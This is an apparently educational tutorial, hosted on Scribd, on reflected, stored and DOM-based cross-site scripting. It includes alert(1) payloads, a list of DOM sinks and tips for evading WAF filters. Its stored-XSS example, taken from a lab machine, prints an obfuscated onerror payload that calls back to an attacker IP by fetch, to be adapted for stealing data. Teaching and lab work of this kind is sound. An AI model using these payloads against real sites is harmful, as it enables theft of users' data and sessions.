KEMBAR78
Cross-Site Scripting (XSS) | PDF | Software Engineering | Computing
0% found this document useful (0 votes)
34 views8 pages

Cross-Site Scripting (XSS)

Uploaded by

harshyadav1361
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
34 views8 pages

Cross-Site Scripting (XSS)

Uploaded by

harshyadav1361
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

Cross-Site Scripting

<script>
Cross-Site Scripting, or XSS, is a vulnerability that would allow attackers to exploit the
interactions that other users have with an application. In short, it can allow us to impersonate
and perform actions as another user, steal information and in some cases, gain RCE.
The most common way of testing if XSS is present on a website is to call the Javascript alert
function. For example, the script tags of HTML can be used :<script>alert(1)</script>. The image
below shows an example of what would pop out.

How it Works
Browsers and websites allow users to interact with them and perform actions through
Javascript. XSS would work via injecting malicious Javascript code to execute on a user's
browser. Basically, scripting across the website.
There are 3 types of XSS:
1. 1.
Reflected XSS
2. 2.
Stored XSS
3. 3.
DOM Based XSS
Reflected XSS
Reflected XSS is the simplest form of the exploit. This occurs when a malicious script is reflected
off a web application and onto the victim's browser. This script is normally activated through a
link or action on the website and would be redirected to the next user.

An example would be as follows:


• Suppose we have a website that had a URL that displayed a user-controlled term like
http://example.com?search=test
• This search term would cause this to appear on the page:
o <p>You searched for: test </p>
• Using Reflected XSS, we can construct a malicious search link that would trigger a pop-
up to appear on screen.
• Assuming the website does not have any filters, we can input
http://example.com?search=<script>alert(1)</script> as the URL.
• When any client enters this link, our malicious script would execute on their end and the
pop-up would show up in their browsers.
• This works because the rendering of HTML would show this:
o <p>You searched for: <script>alert(1)</script></p>
o The script tags allow for an 'escape' from the paragraph tags, and we can execute
Javascript code within the tags.
Reflected XSS attacks still rely on the victim user to make a request they control. We still need
the victim to perform a specific action in order to exploit this. This could be through sending
phishing links or putting links on a website we control.
The reliance on the user makes the impacts of XSS less severe compared to the other forms of
XSS.
Stored XSS
Stored XSS means that the malicious script is stored on the website itself. Then, everytime a
user visits the page that the script is on, it would execute. Stored XSS has much more severe
impacts, as it only requires users to go visit the site. This can be in the form of a blog post
comment, editing the website page to have hidden Javascript, etc.

Here's an example of XSS from the HTB machine, Extension:


After enumeration of the website, we have identified that there is a stored XSS vulnerability in
the 'Report Issues' function of the Gitea instance. The victim has been found to visit the Issues
tab of the Gitea instance from time to time.
This was the payload found to work: test<test><img SRC="x"
onerror=eval.call${"eval\x28atobZmV0Y2goImh0dHA6Ly8xMC4xMC4xNC41LyIp\x29"}>
How this payload works is through rendering an image tag and having a script execute on an
event called 'onerror', which means if the image fails to load, it would load the script. The
scriptis calling an eval function which has a Base64 encoded command using fetch to connect
back to the attacker machine on port 80.
When inputted, the victim would view the Issues and be served this payload. This would result
in the victim's browser making a callback to the attacker machine. On the attacker machine, the
following callback is received:
This confirms that the XSS is working properly. For this machine, the payload can be modified to
include information about a hidden directory that only the victim can access:

Stored XSS is much more dangerous because it stores the script on the page itself and exploiting
every user that visits it. In the above example, XSS was used to steal information about a
directory that only the user could visit. In other cases, stuff like authorisation cookies or
passwords can be stolen by attackers.
DOM-Based XSS
DOM XSS arises when Javascript takes some input from a user-controlled source and processes
it insecurely.
Document Object Model (DOM) is a programming interface for web pages, defining the
structure of a document and how the document is accessed and manipulated. A website can
use Javascript to do something, but uses DOM to access the document and the relevant
elements. DOM is structured like a hiearchy tree, with a root element and other elements that
are children of the root node.
More can be read here:
https://developer.mozilla.org/en-US/docs/Web/API/Document_Object_Model/Introduction
DOM XSS arises when data is passed to something called a sink, which is basically a function
that supports dynamic code execution. This can be a function like eval, for example. Malicious
Javascript code can be passed to this sink and allow for the execution of Javascript used to
hijack other accounts.
Here are some sinks that can be used for DOM XSS:
document.write()
document.writeln()
document.domain
element.innerHTML
element.outerHTML
element.insertAdjacentHTML
element.onevent
add()
after()
append()
animate()
insertAfter()
insertBefore()
before()
html()
prepend()
replaceAll()
replaceWith()
wrap()
wrapInner()
wrapAll()
has()
constructor()
init()
index()
jQuery.parseHTML()
$.parseHTML()
These functions are not limited to only XSS, but can also be used for other DOM exploits, such
as open redirection, through exploiting taint flow vulnerabilities.
There are methods to test the HTML and Javascript sinks that are within a website that require
the use of browser inspector tools, which would involve looking at how data is parsed by the
function. First, we would need to identify a potential source (input location) whereby our input
is processed via the sink. Then we can test them as follows:
• HTML Sinks
o Input HTML strings within a potentially vulnerable sink.
o Check the page source and try to find out string.
o Attempt ot break out of the HTML tags to execute our code.
• Javascript execution sinks
o Sometimes, we cannot see our input anywhere within the DOM, so we can't
search for it.
o Use the Javascript Debugger to determine whether and how our input is sent to
a sink.
o Add a break point and follow how the source's value is read, then track the
variables to see if they are passed to a sink.
o Once we have found the sink, attempt to execute malicious Javascript by
tweaking our payload.
Here's an example of exploiting DOM-based XSS:
Suppose we have this website that has a dashboard customised based on the username. The
username is encoded in the URL and used directly on the page.
<html>
<head>
<title>Custom Dashboard </title>
...
</head>
Main Dashboard for
<script>
var pos=document.URL.indexOf("context=")+8;
document.write(document.URL.substring(pos,document.URL.length));
</script>
...
</html>
We can see that the vulnerable sink used is document.write( ), and the source would be a
context parameter we pass to the website. We can then embed a malicious script in the URL like
this: http://example.com/dashboard.html#context=<script>alert(1)</script>.
A victim would then need to click this link. When the link is clicked and the browser starts
building the DOM of the page, the browser would use the URL provided (in this case, the
malcious link above) and run it. The malicious context parameter would then be extracted and
the HTML is updated to have our code. The browser then runs this code and calls the alert
function, thus making the XSS possible.
Payloads
XSS is a common vulnerablity and there are often measures to prevent it's execution. For
example, a website could restrict the usage of events or <script> tags to prevent users from
exploiting it. However, there are always ways to bypass this.
In basic cases, websites can allow for <script> tags to be used as input and allow for the
embedding of HTML directly on the page. However, if the website has a WAF that does not
allow this, we can brute force the possible tags possible.
Event attributes can be used in conjunction with tags to deliver the payload, such as onerror.
Again, this can be brute forced. A lot of XSS payloads out there are built to bypass WAF
detection and execute our payload. I normally use Portswigger's cheat sheet to find all the
possible tags and events for each browser.
HTML Event attributes allow events to trigger actions on a browser, like starting Javascript whne
a user clicks on an element. For example, using the <img src="x" onerror=alert(1)> payload
would attempt to render an image, which would always result in an error in this case. This
would trigger the alert(1) to happen.
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
There are loads of payload repositories out there, so I'm not going to make one here.
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection

You might also like